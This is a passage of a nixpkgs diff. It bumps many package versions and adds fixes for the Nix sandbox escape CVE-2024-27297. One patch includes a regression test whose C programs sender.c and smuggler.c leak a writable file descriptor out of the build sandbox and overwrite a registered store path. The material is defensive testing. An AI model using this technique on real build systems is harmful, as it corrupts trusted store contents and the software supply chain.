mainProgram = "mqttui"; - }; -} diff --git a/nixpkgs/pkgs/tools/networking/mu/default.nix b/nixpkgs/pkgs/tools/networking/mu/default.nix index 46519c730446..f94e83552130 100644 --- a/nixpkgs/pkgs/tools/networking/mu/default.nix +++ b/nixpkgs/pkgs/tools/networking/mu/default.nix @@ -17,7 +17,7 @@ stdenv.mkDerivation rec { pname = "mu"; - version = "1.12.0"; + version = "1.12.1"; outputs = [ "out" "mu4e" ]; @@ -25,7 +25,7 @@ stdenv.mkDerivation rec { owner = "djcb"; repo = "mu"; rev = "v${version}"; - hash = "sha256-z0sHDZlhsSeIf+ZRCni3j/DbfYrmn6bvYmKpt4PA2i8="; + hash = "sha256-JnKvMbgkaZ1MO7cZMb2PGZsNMjV1M+dnaDpsBDsT0L4="; }; postPatch = '' diff --git a/nixpkgs/pkgs/tools/networking/netbird/default.nix b/nixpkgs/pkgs/tools/networking/netbird/default.nix index dbbfc6b74c4d..20f146ab9330 100644 --- a/nixpkgs/pkgs/tools/networking/netbird/default.nix +++ b/nixpkgs/pkgs/tools/networking/netbird/default.nix @@ -31,13 +31,13 @@ let in buildGoModule rec { pname = "netbird"; - version = "0.26.1"; + version = "0.26.2"; src = fetchFromGitHub { owner = "netbirdio"; repo = pname; rev = "v${version}"; - hash = "sha256-FZ6bPn4birCjvWm43clu3lAES38IooLP7PhUfRMO5+0="; + hash = "sha256-fnKrv8bMONZbZGZtCQUAeGo3OIvOIqLX3nvVfGhYoK8="; }; vendorHash = "sha256-Zp8LAaADpSa/wfnLAQVJ8cG3bMkC7ZU1BT+Dz214c34="; diff --git a/nixpkgs/pkgs/tools/networking/networkmanager/l2tp/default.nix b/nixpkgs/pkgs/tools/networking/networkmanager/l2tp/default.nix index cf7c1c86d3bf..ac60739abcff 100644 --- a/nixpkgs/pkgs/tools/networking/networkmanager/l2tp/default.nix +++ b/nixpkgs/pkgs/tools/networking/networkmanager/l2tp/default.nix @@ -22,13 +22,13 @@ stdenv.mkDerivation rec { name = "${pname}${lib.optionalString withGnome "-gnome"}-${version}"; pname = "NetworkManager-l2tp"; - version = "1.20.10"; + version = "1.20.12"; src = fetchFromGitHub { owner = "nm-l2tp"; repo = "network-manager-l2tp"; rev = version; - hash = "sha256-EfWvh4uSzWFadZAHTqsKa3un2FQ6WUbHLoHo9gSS7bE="; + hash = "sha256-fFgalLDjSOW+f69ZWKthvoeQHkS1max0/WXLOw2eR9Q="; }; patches = [ diff --git a/nixpkgs/pkgs/tools/networking/q/default.nix b/nixpkgs/pkgs/tools/networking/q/default.nix index fdeddef65460..8602cda6da7b 100644 --- a/nixpkgs/pkgs/tools/networking/q/default.nix +++ b/nixpkgs/pkgs/tools/networking/q/default.nix @@ -13,6 +13,12 @@ buildGoModule rec { vendorHash = "sha256-6kdf+LwMrIjwC3uZHlMdpEHvonxKfr86PQaMOgzgYOc="; + ldflags = [ + "-s" + "-w" + "-X main.version=${version}" + ]; + doCheck = false; # tries to resolve DNS meta = { diff --git a/nixpkgs/pkgs/tools/networking/sing-box/default.nix b/nixpkgs/pkgs/tools/networking/sing-box/default.nix index 8cef901c88bc..dee829021ae8 100644 --- a/nixpkgs/pkgs/tools/networking/sing-box/default.nix +++ b/nixpkgs/pkgs/tools/networking/sing-box/default.nix @@ -11,16 +11,16 @@ buildGoModule rec { pname = "sing-box"; - version = "1.8.7"; + version = "1.8.8"; src = fetchFromGitHub { owner = "SagerNet"; repo = pname; rev = "v${version}"; - hash = "sha256-SZd67DyDsKZZ9hKgRtbQLJzfft+vl49k9J/+Xv8ghHs="; + hash = "sha256-HbfN9H6mYRZkD1f5CmDSORP29I00u0Ye8l77wrswTE0="; }; - vendorHash = "sha256-9aH8KHn+8brGT/eJS9SWVYBMxDI1R3Q+pORfnjUI7ms="; + vendorHash = "sha256-tOUzshNU6TIjhWVWmlVcw/Ct/V52b+WIJHqs3+weCc0="; tags = [ "with_quic" diff --git a/nixpkgs/pkgs/tools/networking/sitespeed-io/default.nix b/nixpkgs/pkgs/tools/networking/sitespeed-io/default.nix index 846e386ced3b..e852df0b8d4c 100644 --- a/nixpkgs/pkgs/tools/networking/sitespeed-io/default.nix +++ b/nixpkgs/pkgs/tools/networking/sitespeed-io/default.nix @@ -24,13 +24,13 @@ assert (!withFirefox && !withChromium) -> throw "Either `withFirefox` or `withChromium` must be enabled."; buildNpmPackage rec { pname = "sitespeed-io"; - version = "33.0.0"; + version = "33.1.1"; src = fetchFromGitHub { owner = "sitespeedio"; repo = "sitespeed.io"; rev = "v${version}"; - hash = "sha256-UmviwcxL67fn8B4ruJH9yKdcYVqmxqKSImQszKhDHZ0="; + hash = "sha256-Blzv0fLWqDfLYbtSVTUbhWS75fkqADzEwYQvomeqt1U="; }; nodejs = nodejs_18; @@ -46,7 +46,7 @@ buildNpmPackage rec { dontNpmBuild = true; npmInstallFlags = [ "--omit=dev" ]; - npmDepsHash = "sha256-FggwOnuQ+azgdLxfc6EUAsbl0+il6/2+p1t7MCrTNgE="; + npmDepsHash = "sha256-+oU0+AVWf7PNqZCUI/KYe+PoNrHNaR35N6SifYCSRp4="; postInstall = '' mv $out/bin/sitespeed{.,-}io diff --git a/nixpkgs/pkgs/tools/networking/smartdns/default.nix b/nixpkgs/pkgs/tools/networking/smartdns/default.nix index e7355eb07a75..619a3c773b16 100644 --- a/nixpkgs/pkgs/tools/networking/smartdns/default.nix +++ b/nixpkgs/pkgs/tools/networking/smartdns/default.nix @@ -2,13 +2,13 @@ stdenv.mkDerivation rec { pname = "smartdns"; - version = "43"; + version = "45"; src = fetchFromGitHub { owner = "pymumu"; repo = pname; rev = "Release${version}"; - hash = "sha256-gwbyP2duUvZafMclPwP4uZh7A7OzAvSyqjl6Eg1N6Gg="; + hash = "sha256-aVGIgQkFz8A1UsHsgOSkEEE5vzp4cJEtcaKHv1EzErg="; }; buildInputs = [ openssl ]; @@ -24,7 +24,10 @@ stdenv.mkDerivation rec { installFlags = [ "SYSCONFDIR=${placeholder "out"}/etc" ]; passthru.tests = { - version = testers.testVersion { package = smartdns; }; + version = testers.testVersion { + package = smartdns; + command = "smartdns -v"; + }; }; meta = with lib; { diff --git a/nixpkgs/pkgs/tools/networking/snowflake/default.nix b/nixpkgs/pkgs/tools/networking/snowflake/default.nix index cac350ff597a..f48824f04054 100644 --- a/nixpkgs/pkgs/tools/networking/snowflake/default.nix +++ b/nixpkgs/pkgs/tools/networking/snowflake/default.nix @@ -2,7 +2,7 @@ buildGoModule rec { pname = "snowflake"; - version = "2.9.0"; + version = "2.9.1"; src = fetchFromGitLab { domain = "gitlab.torproject.org"; @@ -10,10 +10,10 @@ buildGoModule rec { owner = "anti-censorship/pluggable-transports"; repo = "snowflake"; rev = "v${version}"; - sha256 = "sha256-h8T8kc7idZcfepVjhpX+0RIypFDp2nMt3ZZ61YmeLQk="; + sha256 = "sha256-LDr/Fzg1fC2lf7W+yTD1y5q4C2pPXZz+ZJf9sI1BxcQ="; }; - vendorHash = "sha256-TSB0UDVD9ijOFgOmIh7ppnKJn/VWzejeDcb1+30+Mnc="; + vendorHash = "sha256-IT2+5HmgkV6BKPEARkCZbULyVr7VDLtwGUCF22YuodA="; meta = with lib; { description = "System to defeat internet censorship"; diff --git a/nixpkgs/pkgs/tools/networking/subnetcalc/default.nix b/nixpkgs/pkgs/tools/networking/subnetcalc/default.nix index e2d74a586d81..4c88c6cb29f7 100644 --- a/nixpkgs/pkgs/tools/networking/subnetcalc/default.nix +++ b/nixpkgs/pkgs/tools/networking/subnetcalc/default.nix @@ -7,13 +7,13 @@ stdenv.mkDerivation (finalAttrs: { pname = "subnetcalc"; - version = "2.4.23"; + version = "2.5.1"; src = fetchFromGitHub { owner = "dreibh"; repo = "subnetcalc"; rev = "subnetcalc-${finalAttrs.version}"; - hash = "sha256-uX/roOWjeuuuEFpBbF+hEPDOo0RTR79WpyNvr9U7wR4="; + hash = "sha256-uP2T7c5aBvOsuJK648WNWO9WmRN4WCRlAIBFYTYyUkw="; }; nativeBuildInputs = [ diff --git a/nixpkgs/pkgs/tools/networking/termscp/Cargo.lock.patch b/nixpkgs/pkgs/tools/networking/termscp/Cargo.lock.patch deleted file mode 100644 index 76b2d996e25e..000000000000 --- a/nixpkgs/pkgs/tools/networking/termscp/Cargo.lock.patch +++ /dev/null @@ -1,13 +0,0 @@ -diff --git i/Cargo.lock w/Cargo.lock -index 5cbb602..47046b8 100644 ---- i/Cargo.lock -+++ w/Cargo.lock -@@ -2949,7 +2949,7 @@ dependencies = [ - - [[package]] - name = "termscp" --version = "0.12.2" -+version = "0.12.3" - dependencies = [ - "argh", - "bitflags 2.3.3", diff --git a/nixpkgs/pkgs/tools/networking/termscp/default.nix b/nixpkgs/pkgs/tools/networking/termscp/default.nix index 101a38e4f5dd..924de6cf1e2e 100644 --- a/nixpkgs/pkgs/tools/networking/termscp/default.nix +++ b/nixpkgs/pkgs/tools/networking/termscp/default.nix @@ -14,20 +14,16 @@ rustPlatform.buildRustPackage rec { pname = "termscp"; - version = "0.12.3"; + version = "0.13.0"; src = fetchFromGitHub { owner = "veeso"; - repo = pname; + repo = "termscp"; rev = "refs/tags/v${version}"; - hash = "sha256-+5s5PskSHZKv1deti5r986qXg8J9APuVXY+Lvq3ki0w="; + hash = "sha256-/Mnoljgp87ML6+3vV1vZTFO0TSY5hr8E8U1fXJq31pE="; }; - cargoPatches = [ - ./Cargo.lock.patch - ]; - - cargoHash = "sha256-2RmYxtjJm70qbiGl8YHXgebtvNsQvBdgkNDm8td9oNk="; + cargoHash = "sha256-xq21cncEYNSwDiKvVSM1J2Jz3TqOkYMK3gckKpM5+6E="; nativeBuildInputs = [ pkg-config diff --git a/nixpkgs/pkgs/tools/networking/tgt/default.nix b/nixpkgs/pkgs/tools/networking/tgt/default.nix index 734bf10790f0..349c0823a510 100644 --- a/nixpkgs/pkgs/tools/networking/tgt/default.nix +++ b/nixpkgs/pkgs/tools/networking/tgt/default.nix @@ -4,13 +4,13 @@ stdenv.mkDerivation rec { pname = "tgt"; - version = "1.0.90"; + version = "1.0.91"; src = fetchFromGitHub { owner = "fujita"; repo = pname; rev = "v${version}"; - sha256 = "sha256-C1xrsL7+S+TyMWULVuw7+ZV5hxfhXorScfqndomefRw="; + sha256 = "sha256-/aykQolUWcCU/PV3bYq8cR0oSAS+ojzZC5PBWgIh2dM="; }; nativeBuildInputs = [ libxslt docbook_xsl makeWrapper ]; diff --git a/nixpkgs/pkgs/tools/networking/vopono/default.nix b/nixpkgs/pkgs/tools/networking/vopono/default.nix index f540d59d9a01..d2bb8fec3aa0 100644 --- a/nixpkgs/pkgs/tools/networking/vopono/default.nix +++ b/nixpkgs/pkgs/tools/networking/vopono/default.nix @@ -5,14 +5,14 @@ rustPlatform.buildRustPackage rec { pname = "vopono"; - version = "0.10.8"; + version = "0.10.9"; src = fetchCrate { inherit pname version; - hash = "sha256-D+yROQidu+a3qzCNrVxn0RNutIHNcIjMSNqPLHwA+zA="; + hash = "sha256-j8o9UxyBE7uML/7gw9UYbXLNYK9ka2jhUw5/v7pxIc8="; }; - cargoHash = "sha256-oKoSHjABtaJYGyJ/G0zXC42XpXiUXwdPsOhyL1+D3GI="; + cargoHash = "sha256-foJSaifllpGNMfxWMGm4BWwItOdtAmUcaOO1j1JMCpo="; meta = with lib; { description = "Run applications through VPN connections in network namespaces"; diff --git a/nixpkgs/pkgs/tools/nix/nixos-option/nixos-option.cc b/nixpkgs/pkgs/tools/nix/nixos-option/nixos-option.cc index e2a73866d0ed..d8c3d46c4fa1 100644 --- a/nixpkgs/pkgs/tools/nix/nixos-option/nixos-option.cc +++ b/nixpkgs/pkgs/tools/nix/nixos-option/nixos-option.cc @@ -368,20 +368,20 @@ std::string describeError(const Error & e) { return "«error: " + e.msg() + "»" void describeDerivation(Context & ctx, Out & out, Value v) { // Copy-pasted from nix/src/nix/repl.cc :( + out << "«derivation "; Bindings::iterator i = v.attrs->find(ctx.state.sDrvPath); - PathSet pathset; - try { - Path drvPath = i != v.attrs->end() ? ctx.state.coerceToPath(i->pos, *i->value, pathset, "while evaluating the drvPath of a derivation") : "???"; - out << "«derivation " << drvPath << "»"; - } catch (Error & e) { - out << describeError(e); - } + nix::NixStringContext strContext; + if (i != v.attrs->end()) + out << ctx.state.store->printStorePath(ctx.state.coerceToStorePath(i->pos, *i->value, strContext, "while evaluating the drvPath of a derivation")); + else + out << "???"; + out << "»"; } Value parseAndEval(EvalState & state, const std::string & expression, const std::string & path) { Value v{}; - state.eval(state.parseExprFromString(expression, absPath(path)), v); + state.eval(state.parseExprFromString(expression, nix::SourcePath(nix::CanonPath::fromCwd(path))), v); return v; } diff --git a/nixpkgs/pkgs/tools/package-management/deploy-rs/default.nix b/nixpkgs/pkgs/tools/package-management/deploy-rs/default.nix index 72eacb558bb8..ad656ca385e4 100644 --- a/nixpkgs/pkgs/tools/package-management/deploy-rs/default.nix +++ b/nixpkgs/pkgs/tools/package-management/deploy-rs/default.nix @@ -8,16 +8,16 @@ rustPlatform.buildRustPackage { pname = "deploy-rs"; - version = "unstable-2023-12-20"; + version = "unstable-2024-02-16"; src = fetchFromGitHub { owner = "serokell"; repo = "deploy-rs"; - rev = "b709d63debafce9f5645a5ba550c9e0983b3d1f7"; - hash = "sha256-0VUbWBW8VyiDRuimMuLsEO4elGuUw/nc2WDeuO1eN1M="; + rev = "0a0187794ac7f7a1e62cda3dabf8dc041f868790"; + hash = "sha256-dTGGw2y8wvfjr+J9CjQbfdulOq72hUG17HXVNxpH1yE="; }; - cargoHash = "sha256-PVeCB1g3JSYE6PKWHyE3hfN/CKlb9XErt8uaD/ZyxIs="; + cargoHash = "sha256-Vo/45cZM/sBAaoikhEwCvduhMQjurwSZwCjwrIQn7IA="; buildInputs = lib.optionals stdenv.isDarwin [ CoreServices diff --git a/nixpkgs/pkgs/tools/package-management/dnf5/default.nix b/nixpkgs/pkgs/tools/package-management/dnf5/default.nix index 129b98867cb0..fc22001a5192 100644 --- a/nixpkgs/pkgs/tools/package-management/dnf5/default.nix +++ b/nixpkgs/pkgs/tools/package-management/dnf5/default.nix @@ -30,7 +30,7 @@ stdenv.mkDerivation (finalAttrs: { pname = "dnf5"; - version = "5.1.13"; + version = "5.1.14"; outputs = [ "out" "man" ]; @@ -38,7 +38,7 @@ stdenv.mkDerivation (finalAttrs: { owner = "rpm-software-management"; repo = "dnf5"; rev = finalAttrs.version; - hash = "sha256-6fgQA9L6yBDdtCzxPg+EyxERr/dzW1PWVaT1+lRCXmo="; + hash = "sha256-LVemkL3Ysv2hS0/c+ZTqzEKq3kFu+T1rEBwZpjssE2k="; }; nativeBuildInputs = [ diff --git a/nixpkgs/pkgs/tools/package-management/dpkg/default.nix b/nixpkgs/pkgs/tools/package-management/dpkg/default.nix index 59e259541992..b286a7b51b9f 100644 --- a/nixpkgs/pkgs/tools/package-management/dpkg/default.nix +++ b/nixpkgs/pkgs/tools/package-management/dpkg/default.nix @@ -18,12 +18,12 @@ stdenv.mkDerivation rec { pname = "dpkg"; - version = "1.22.1"; + version = "1.22.4"; src = fetchgit { url = "https://git.launchpad.net/ubuntu/+source/dpkg"; rev = "applied/${version}"; - hash = "sha256-63XRO3Img+XS2F5Krb5DAw0LMhtxB+eJi754O03Lx8Q="; + hash = "sha256-tpYSOimBd78rAthQUga/MNraWll9qEA+vRG+/F+t3mM="; }; configureFlags = [ diff --git a/nixpkgs/pkgs/tools/package-management/nix/common.nix b/nixpkgs/pkgs/tools/package-management/nix/common.nix index cab48bbaf5b6..d0840d206b67 100644 --- a/nixpkgs/pkgs/tools/package-management/nix/common.nix +++ b/nixpkgs/pkgs/tools/package-management/nix/common.nix @@ -15,6 +15,15 @@ let atLeast210 = lib.versionAtLeast version "2.10pre"; atLeast213 = lib.versionAtLeast version "2.13pre"; atLeast214 = lib.versionAtLeast version "2.14pre"; + atLeast220 = lib.versionAtLeast version "2.20pre"; + atLeast221 = lib.versionAtLeast version "2.21pre"; + # Major.minor versions unaffected by CVE-2024-27297 + unaffectedByFodSandboxEscape = [ + "2.3" + "2.18" + "2.19" + "2.20" + ]; in { stdenv , autoconf-archive @@ -40,6 +49,7 @@ in , lib , libarchive , libcpuid +, libgit2 , libsodium , libxml2 , libxslt @@ -118,6 +128,8 @@ self = stdenv.mkDerivation { gtest libarchive lowdown + ] ++ lib.optionals atLeast220 [ + libgit2 ] ++ lib.optionals stdenv.isDarwin [ Security ] ++ lib.optionals (stdenv.isx86_64) [ @@ -249,6 +261,7 @@ self = stdenv.mkDerivation { platforms = platforms.unix; outputsToInstall = [ "out" ] ++ optional enableDocumentation "man"; mainProgram = "nix"; + knownVulnerabilities = lib.optional (!builtins.elem (lib.versions.majorMinor version) unaffectedByFodSandboxEscape && !atLeast221) "CVE-2024-27297"; }; }; in self diff --git a/nixpkgs/pkgs/tools/package-management/nix/default.nix b/nixpkgs/pkgs/tools/package-management/nix/default.nix index c3f970f78fb3..92c988ea5d08 100644 --- a/nixpkgs/pkgs/tools/package-management/nix/default.nix +++ b/nixpkgs/pkgs/tools/package-management/nix/default.nix @@ -17,8 +17,19 @@ let boehmgc-nix_2_3 = boehmgc.override { enableLargeConfig = true; }; boehmgc-nix = boehmgc-nix_2_3.overrideAttrs (drv: { - # Part of the GC solution in https://github.com/NixOS/nix/pull/4944 - patches = (drv.patches or [ ]) ++ [ ./patches/boehmgc-coroutine-sp-fallback.patch ]; + patches = (drv.patches or [ ]) ++ [ + # Part of the GC solution in https://github.com/NixOS/nix/pull/4944 + ./patches/boehmgc-coroutine-sp-fallback.patch + + # Required since 2.20, and has always been a valid change + # Awaiting 8.2 patch release of https://github.com/ivmai/bdwgc/commit/d1d4194c010bff2dc9237223319792cae834501c + # or master release of https://github.com/ivmai/bdwgc/commit/86b3bf0c95b66f718c3cb3d35fd7387736c2a4d7 + (fetchpatch { + name = "boehmgc-traceable_allocator-public.diff"; + url = "https://github.com/NixOS/nix/raw/2.20.0/dep-patches/boehmgc-traceable_allocator-public.diff"; + hash = "sha256-FLsHY/JS46neiSyyQkVpbHZEFvWSCzWrFQu1CC71sh4="; + }) + ]; }); # old nix fails to build with newer aws-sdk-cpp and the patch doesn't apply @@ -156,6 +167,7 @@ in lib.makeExtensible (self: ({ hash = "sha256-EK0pgHDekJFqr0oMj+8ANIjq96WPjICe2s0m4xkUdH4="; patches = [ patch-monitorfdhup + ./patches/2_3/CVE-2024-27297.patch ]; maintainers = with lib.maintainers; [ flokli raitobezarius ]; }).override { boehmgc = boehmgc-nix_2_3; }; @@ -234,12 +246,21 @@ in lib.makeExtensible (self: ({ hash = "sha256-WNmifcTsN9aG1ONkv+l2BC4sHZZxtNKy0keqBHXXQ7w="; patches = [ patch-rapidcheck-shared + ./patches/2_18/CVE-2024-27297.patch ]; }; nix_2_19 = common { version = "2.19.3"; hash = "sha256-EtL6M0H5+0mFbFh+teVjm+0B+xmHoKwtBvigS5NMWoo="; + patches = [ + ./patches/2_19/CVE-2024-27297.patch + ]; + }; + + nix_2_20 = common { + version = "2.20.5"; + hash = "sha256-bfFe38BkoQws7om4gBtBWoNTLkt9piMXdLLoHYl+vBQ="; }; # The minimum Nix version supported by Nixpkgs @@ -261,7 +282,7 @@ in lib.makeExtensible (self: ({ stable = addFallbackPathsCheck self.nix_2_18; - unstable = self.nix_2_19; + unstable = self.nix_2_20; } // lib.optionalAttrs config.allowAliases { nix_2_4 = throw "nixVersions.nix_2_4 has been removed"; diff --git a/nixpkgs/pkgs/tools/package-management/nix/patches/2_18/CVE-2024-27297.patch b/nixpkgs/pkgs/tools/package-management/nix/patches/2_18/CVE-2024-27297.patch new file mode 100644 index 000000000000..8d110d46a6bb --- /dev/null +++ b/nixpkgs/pkgs/tools/package-management/nix/patches/2_18/CVE-2024-27297.patch @@ -0,0 +1,379 @@ +From f8d20e91a45f71b60402f5916d2475751c089c84 Mon Sep 17 00:00:00 2001 +From: Tom Bereknyei <tomberek@gmail.com> +Date: Fri, 1 Mar 2024 03:42:26 -0500 +Subject: [PATCH 1/3] Add a NixOS test for the sandbox escape + +Test that we can't leverage abstract unix domain sockets to leak file +descriptors out of the sandbox and modify the path after it has been +registered. + +Co-authored-by: Theophane Hufschmitt <theophane.hufschmitt@tweag.io> +--- + flake.nix | 2 + + tests/nixos/ca-fd-leak/default.nix | 90 ++++++++++++++++++++++++++++++ + tests/nixos/ca-fd-leak/sender.c | 65 +++++++++++++++++++++ + tests/nixos/ca-fd-leak/smuggler.c | 66 ++++++++++++++++++++++ + 4 files changed, 223 insertions(+) + create mode 100644 tests/nixos/ca-fd-leak/default.nix + create mode 100644 tests/nixos/ca-fd-leak/sender.c + create mode 100644 tests/nixos/ca-fd-leak/smuggler.c + +diff --git a/flake.nix b/flake.nix +index 230bb6031..4a54c660f 100644 +--- a/flake.nix ++++ b/flake.nix +@@ -634,6 +634,8 @@ + ["i686-linux" "x86_64-linux"] + (system: runNixOSTestFor system ./tests/nixos/setuid.nix); + ++ tests.ca-fd-leak = runNixOSTestFor "x86_64-linux" ./tests/nixos/ca-fd-leak; ++ + + # Make sure that nix-env still produces the exact same result + # on a particular version of Nixpkgs. +diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix +new file mode 100644 +index 000000000..a6ae72adc +--- /dev/null ++++ b/tests/nixos/ca-fd-leak/default.nix +@@ -0,0 +1,90 @@ ++# Nix is a sandboxed build system. But Not everything can be handled inside its ++# sandbox: Network access is normally blocked off, but to download sources, a ++# trapdoor has to exist. Nix handles this by having "Fixed-output derivations". ++# The detail here is not important, but in our case it means that the hash of ++# the output has to be known beforehand. And if you know that, you get a few ++# rights: you no longer run inside a special network namespace! ++# ++# Now, Linux has a special feature, that not many other unices do: Abstract ++# unix domain sockets! Not only that, but those are namespaced using the ++# network namespace! That means that we have a way to create sockets that are ++# available in every single fixed-output derivation, and also all processes ++# running on the host machine! Now, this wouldn't be that much of an issue, as, ++# well, the whole idea is that the output is pure, and all processes in the ++# sandbox are killed before finalizing the output. What if we didn't need those ++# processes at all? Unix domain sockets have a semi-known trick: you can pass ++# file descriptors around! ++# This makes it possible to exfiltrate a file-descriptor with write access to ++# $out outside of the sandbox. And that file-descriptor can be used to modify ++# the contents of the store path after it has been registered. ++ ++{ config, ... }: ++ ++let ++ pkgs = config.nodes.machine.nixpkgs.pkgs; ++ ++ # Simple C program that sends a a file descriptor to `$out` to a Unix ++ # domain socket. ++ # Compiled statically so that we can easily send it to the VM and use it ++ # inside the build sandbox. ++ sender = pkgs.runCommandWith { ++ name = "sender"; ++ stdenv = pkgs.pkgsStatic.stdenv; ++ } '' ++ $CC -static -o $out ${./sender.c} ++ ''; ++ ++ # Okay, so we have a file descriptor shipped out of the FOD now. But the ++ # Nix store is read-only, right? .. Well, yeah. But this file descriptor ++ # lives in a mount namespace where it is not! So even when this file exists ++ # in the actual Nix store, we're capable of just modifying its contents... ++ smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c); ++ ++ # The abstract socket path used to exfiltrate the file descriptor ++ socketName = "FODSandboxExfiltrationSocket"; ++in ++{ ++ name = "ca-fd-leak"; ++ ++ nodes.machine = ++ { config, lib, pkgs, ... }: ++ { virtualisation.writableStore = true; ++ nix.settings.substituters = lib.mkForce [ ]; ++ virtualisation.additionalPaths = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ]; ++ }; ++ ++ testScript = { nodes }: '' ++ start_all() ++ ++ machine.succeed("echo hello") ++ # Start the smuggler server ++ machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &") ++ ++ # Build the smuggled derivation. ++ # This will connect to the smuggler server and send it the file descriptor ++ machine.succeed(r""" ++ nix-build -E ' ++ builtins.derivation { ++ name = "smuggled"; ++ system = builtins.currentSystem; ++ # look ma, no tricks! ++ outputHashMode = "flat"; ++ outputHashAlgo = "sha256"; ++ outputHash = builtins.hashString "sha256" "hello, world\n"; ++ builder = "${pkgs.busybox-sandbox-shell}/bin/sh"; ++ args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ]; ++ }' ++ """.strip()) ++ ++ ++ # Tell the smuggler server that we're done ++ machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}") ++ ++ # Check that the file was not modified ++ machine.succeed(r""" ++ cat ./result ++ test "$(cat ./result)" = "hello, world" ++ """.strip()) ++ ''; ++ ++} +diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c +new file mode 100644 +index 000000000..75e54fc8f +--- /dev/null ++++ b/tests/nixos/ca-fd-leak/sender.c +@@ -0,0 +1,65 @@ ++#include <sys/socket.h> ++#include <sys/un.h> ++#include <stdlib.h> ++#include <stddef.h> ++#include <stdio.h> ++#include <unistd.h> ++#include <fcntl.h> ++#include <errno.h> ++#include <string.h> ++#include <assert.h> ++ ++int main(int argc, char **argv) { ++ ++ assert(argc == 2); ++ ++ int sock = socket(AF_UNIX, SOCK_STREAM, 0); ++ ++ // Set up a abstract domain socket path to connect to. ++ struct sockaddr_un data; ++ data.sun_family = AF_UNIX; ++ data.sun_path[0] = 0; ++ strcpy(data.sun_path + 1, argv[1]); ++ ++ // Now try to connect, To ensure we work no matter what order we are ++ // executed in, just busyloop here. ++ int res = -1; ++ while (res < 0) { ++ res = connect(sock, (const struct sockaddr *)&data, ++ offsetof(struct sockaddr_un, sun_path) ++ + strlen(argv[1]) ++ + 1); ++ if (res < 0 && errno != ECONNREFUSED) perror("connect"); ++ if (errno != ECONNREFUSED) break; ++ } ++ ++ // Write our message header. ++ struct msghdr msg = {0}; ++ msg.msg_control = malloc(128); ++ msg.msg_controllen = 128; ++ ++ // Write an SCM_RIGHTS message containing the output path. ++ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); ++ hdr->cmsg_len = CMSG_LEN(sizeof(int)); ++ hdr->cmsg_level = SOL_SOCKET; ++ hdr->cmsg_type = SCM_RIGHTS; ++ int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640); ++ memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int)); ++ ++ msg.msg_controllen = CMSG_SPACE(sizeof(int)); ++ ++ // Write a single null byte too. ++ msg.msg_iov = malloc(sizeof(struct iovec)); ++ msg.msg_iov[0].iov_base = ""; ++ msg.msg_iov[0].iov_len = 1; ++ msg.msg_iovlen = 1; ++ ++ // Send it to the othher side of this connection. ++ res = sendmsg(sock, &msg, 0); ++ if (res < 0) perror("sendmsg"); ++ int buf; ++ ++ // Wait for the server to close the socket, implying that it has ++ // received the commmand. ++ recv(sock, (void *)&buf, sizeof(int), 0); ++} +diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c +new file mode 100644 +index 000000000..82acf37e6 +--- /dev/null ++++ b/tests/nixos/ca-fd-leak/smuggler.c +@@ -0,0 +1,66 @@ ++#include <sys/socket.h> ++#include <sys/un.h> ++#include <stdlib.h> ++#include <stddef.h> ++#include <stdio.h> ++#include <unistd.h> ++#include <assert.h> ++ ++int main(int argc, char **argv) { ++ ++ assert(argc == 2); ++ ++ int sock = socket(AF_UNIX, SOCK_STREAM, 0); ++ ++ // Bind to the socket. ++ struct sockaddr_un data; ++ data.sun_family = AF_UNIX; ++ data.sun_path[0] = 0; ++ strcpy(data.sun_path + 1, argv[1]); ++ int res = bind(sock, (const struct sockaddr *)&data, ++ offsetof(struct sockaddr_un, sun_path) ++ + strlen(argv[1]) ++ + 1); ++ if (res < 0) perror("bind"); ++ ++ res = listen(sock, 1); ++ if (res < 0) perror("listen"); ++ ++ int smuggling_fd = -1; ++ ++ // Accept the connection a first time to receive the file descriptor. ++ fprintf(stderr, "%s\n", "Waiting for the first connection"); ++ int a = accept(sock, 0, 0); ++ if (a < 0) perror("accept"); ++ ++ struct msghdr msg = {0}; ++ msg.msg_control = malloc(128); ++ msg.msg_controllen = 128; ++ ++ // Receive the file descriptor as sent by the smuggler. ++ recvmsg(a, &msg, 0); ++ ++ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); ++ while (hdr) { ++ if (hdr->cmsg_level == SOL_SOCKET ++ && hdr->cmsg_type == SCM_RIGHTS) { ++ ++ // Grab the copy of the file descriptor. ++ memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int)); ++ } ++ ++ hdr = CMSG_NXTHDR(&msg, hdr); ++ } ++ fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection"); ++ close(a); ++ ++ // Wait for a second connection, which will tell us that the build is ++ // done ++ a = accept(sock, 0, 0); ++ fprintf(stderr, "%s\n", "Got a second connection, rewriting the file"); ++ // Write a new content to the file ++ if (ftruncate(smuggling_fd, 0)) perror("ftruncate"); ++ char * new_content = "Pwned\n"; ++ int written_bytes = write(smuggling_fd, new_content, strlen(new_content)); ++ if (written_bytes != strlen(new_content)) perror("write"); ++} +-- +2.42.0 + + +From 4bc5a3510fa3735798f9ed3a2a30a3ea7b32343a Mon Sep 17 00:00:00 2001 +From: Tom Bereknyei <tomberek@gmail.com> +Date: Fri, 1 Mar 2024 03:45:39 -0500 +Subject: [PATCH 2/3] Copy the output of fixed-output derivations before + registering them + +It is possible to exfiltrate a file descriptor out of the build sandbox +of FODs, and use it to modify the store path after it has been +registered. +To avoid that issue, don't register the output of the build, but a copy +of it (that will be free of any leaked file descriptor). + +Co-authored-by: Theophane Hufschmitt <theophane.hufschmitt@tweag.io> +Co-authored-by: Valentin Gagarin <valentin.gagarin@tweag.io> +--- + src/libstore/build/local-derivation-goal.cc | 6 ++++++ + src/libutil/filesystem.cc | 6 ++++++ + src/libutil/util.hh | 7 +++++++ + 3 files changed, 19 insertions(+) + +diff --git 